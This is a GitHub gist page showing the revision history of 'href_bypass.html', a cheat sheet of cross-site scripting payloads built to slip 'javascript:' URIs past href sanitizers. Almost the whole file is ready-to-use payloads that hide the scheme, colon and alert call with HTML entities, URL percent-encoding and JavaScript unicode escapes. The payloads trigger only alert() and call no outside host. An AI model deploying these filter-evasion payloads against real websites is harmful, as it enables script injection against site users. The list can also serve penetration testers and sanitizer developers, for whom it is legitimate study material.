Skip to content

Instantly share code, notes, and snippets.

@thawkhant
Forked from xsuperbug/href_bypass.html
Created October 31, 2023 14:36
Show Gist options
  • Save thawkhant/55307a5a07c9ce1456008fc799b8f6ac to your computer and use it in GitHub Desktop.
Save thawkhant/55307a5a07c9ce1456008fc799b8f6ac to your computer and use it in GitHub Desktop.

Revisions

  1. @hackerscrolls hackerscrolls revised this gist Jun 13, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion href_bypass.html
    Original file line number Diff line number Diff line change
    @@ -11,7 +11,7 @@
    javascript:alert()

    <!-- alert -->
    #html entities/encode:
    #HTML entities/encode:
    javascript:alert&lpar;&rpar;
    javascript:al&#x65;rt``

  2. @hackerscrolls hackerscrolls created this gist Jun 13, 2020.
    25 changes: 25 additions & 0 deletions href_bypass.html
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,25 @@
    <!--javascript -->
    ja&Tab;vascript:alert(1)
    ja&NewLine;vascript:alert(1)
    ja&#x0000A;vascript:alert(1)
    java&#x73;cript:alert()

    <!--::colon:: -->
    javascript&colon;alert()
    javascript&#x0003A;alert()
    javascript&#58;alert(1)
    javascript&#x3A;alert()

    <!-- alert -->
    #html entities/encode:
    javascript:alert&lpar;&rpar;
    javascript:al&#x65;rt``

    #url encoding:
    javascript:alert%60%60
    javascript:x='%27-alert(1)-%27';
    javascript:%61%6c%65%72%74%28%29

    #JS unicode
    javascript:a\u006Cert``"
    javascript:\u0061\u006C\u0065\u0072\u0074``